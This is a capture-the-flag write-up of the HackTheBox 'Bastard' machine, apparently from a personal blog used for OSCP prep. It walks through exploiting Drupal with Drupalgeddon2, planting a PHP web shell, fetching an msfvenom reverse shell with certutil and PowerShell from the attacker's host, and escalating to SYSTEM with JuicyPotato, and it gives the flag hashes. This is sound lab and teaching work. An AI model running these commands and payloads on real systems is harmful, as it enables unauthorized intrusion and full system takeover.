HackTheBox | Bastard

HackTheBox | Bastard
HackTheBox | Bastard
In: HackTheBox, TJ Null OSCP Practice, OSCP Prep, Attack, CTF

Nmap Results

# Nmap 7.92 scan initiated Tue Aug 16 00:34:56 2022 as: nmap -T5 -p80,135,49154 -A -oA scan-all -Pn 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.014s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   15.45 ms 10.10.14.1
2   15.71 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 00:36:10 2022 -- 1 IP address (1 host up) scanned in 74.38 seconds





Service Enumeration

TCP/80

Good info from the nmap scan:

  • http-server-header: Microsoft-IIS/7.5
  • Drupal 7

I check out the /robots.txt file and note the /CHANGELOG.txt entry. Opening it in the browser, it discloses a precise version number, so I take note of that for exploit research.

Tried to enumerate more files and folders with gobuster and feroxbuster , but the web server is throttling my requests. So, I'll focus on researching vulnerabilities for this version of Drupal instead.

Let's see what kind of exploits are available in Exploit DB. I am going to filter out authenticated and Metasploit payloads because:

  • We do not have a valid set of credentials
  • Doing this as OSCP prep, so trying to limit Metasploit usage
searchsploit Drupal 7 | grep -viE 'authenticated|metasploit'

This exploit looks like it could work for the version of Drupal on the target:

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb

Let's copy the exploit to the current working directory:

searchsploit -m 44449

Now, let's examine the exploit:

  • The exploit makes a request to the user registration form, the URL varies based on whether or not Drupal clean URLs are enabled or not.
# Make a request, check for clean URLs status ~ Enabled: /user/register   Disabled: /?q=user/register

  • Then, the exploit crafts a URL and payload depending on the Drupal version.
  • For Drupal 7, we inject the payload into the name field of the form
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")

  • Next, the exploit tests code execution in the web form by injecting a random string into the name field
  • If the server responds HTTP 200 or HTTP 500 and there's a response body, we should be good to exploit
  # Generate a random string to see if we can echo it
  random = (0...8).map { (65 + rand(26)).chr }.join
  url, payload = gen_evil_url("echo #{random}", e)

  response = http_request(url, "post", payload, $session_cookie)
  if (response.code == "200" or response.code == "500") and not response.body.empty?

  • Finally, the exploit injects a PHP backdoor via the form field and writes to shell.php the web root
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"

# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
  break
  
# Forever loop
loop do
  # Default value
  result = "~ERROR~"

  # Get input
  command = Readline.readline("#{prompt}>> ", true).to_s

  # Check input
  puts warning("WARNING: Detected an known bad character (>)") if command =~ />/

  # Exit
  break if command == "exit"
  
...
...
...





Exploit

You may need to install a required Ruby dependency to use this exploit:

sudo gem install highline

Then, run the exploit:

ruby 44449.rb http://10.10.10.9





Post-Exploit Enumeration

The first line of order will be to get a more reliable shell. I am going to double-check the target system architecture and generate a reverse shell payload using msfvenom that I can execute as needed through the PHP pseudo-shell.

drupalgeddon2 >> systeminfo

System Type:               x64-based PC

Now, generate a reverse shell payload.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe

Start a Python web server to transfer the file to the target:

sudo python3 -m http.server 80

Use the PHP pseudo-shell to download the file to the target:

certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe

Start a listener and run the exploit:

sudo nc -lnvp <kali-tcp-port>

drupalgeddon2 >> cmd.exe /c C:\Windows\Temp\shell.exe

Operating Environment

OS & Kernel

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          16/8/2022, 7:32:24 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.494 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.512 MB
Virtual Memory: In Use:    583 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Current User

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled



Users and Groups

Local Users

AccountType Domain  Name          Disabled
----------- ------  ----          --------
        512 BASTARD Administrator    False
        512 BASTARD dimitris         False
        512 BASTARD Guest             True

Local Groups

Domain                                  Name                                   
------                                  ----                                   
BASTARD                                 Administrators                         
BASTARD                                 Backup Operators                       
BASTARD                                 Certificate Service DCOM Access        
BASTARD                                 Cryptographic Operators                
BASTARD                                 Distributed COM Users                  
BASTARD                                 Event Log Readers                      
BASTARD                                 Guests                                 
BASTARD                                 IIS_IUSRS                              
BASTARD                                 Network Configuration Operators        
BASTARD                                 Performance Log Users                  
BASTARD                                 Performance Monitor Users              
BASTARD                                 Power Users                            
BASTARD                                 Print Operators                        
BASTARD                                 Remote Desktop Users                   
BASTARD                                 Replicator                             
BASTARD                                 Users



Network Configurations

Interfaces

Windows IP Configuration

   Host Name . . . . . . . . . . . . : Bastard
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-42-2D
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{56FEC108-3F71-4327-BF45-2B4EE355CD0F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Open Ports

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       372
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       744
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.9:139         0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:81                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       668
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       372
  TCP    [::]:49153             [::]:0                 LISTENING       744
  TCP    [::]:49154             [::]:0                 LISTENING       796
  TCP    [::]:49155             [::]:0                 LISTENING       480
  TCP    [::]:49156             [::]:0                 LISTENING       496





Privilege Escalation

Looking at the output of the whoami command, the first thing that stuck out to me is the SeImpersonatePrivilege , which immediately makes me think JuicyPotato.

The privilege escalation process will look like this:

  1. Download the 64-bit JuicyPotato.exe binary to Kali
  2. Transfer it to the target using a Python web server
  3. Find a CLSID for ComSvcs process
  4. Start a listener on Kali
  5. Run JuicyPotato.exe and re-use the PowerShell reverse shell exploit we already put on the host at C:\Windows\Temp\shell.exe .



First step is to download JuicyPotato.exe here and spin up the Python web server.

Releases · ohpe/juicy-potato
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. - ohpe/juicy-potato
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80

Now, let's download it to the target using our PowerShell reverse shell:

(New-Object Net.WebClient).DownloadFile('http://kali-vpn-ip/JuicyPotato.exe', 'C:\Windows\Temp\JuicyPotato.exe')

You can find a list of ComSvcs CLSID GUIDs for Windows Server 2008 R2 here. Preferably, choose a CLSID with SYSTEM privileges.

Windows Server 2008 R2 Enterprise
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

Start a listener on Kali and run the exploit. We are going to re-use our PowerShell reverse shell payload, so use the same TCP port as before.

sudo nc -lnvp <kali-tcp-port>

We'll use the JuicyPotato.exe exploit to run cmd.exe as SYSTEM , which will then invoke our reverse shell.

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'





Flags

C:\Users\dimitris\Desktop\user.txt

d74dd2dd6d42153770e0acbed24eb314

C:\Users\Administrator\Desktop\root.txt

176631de8dd060d1c027607d0639471c
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.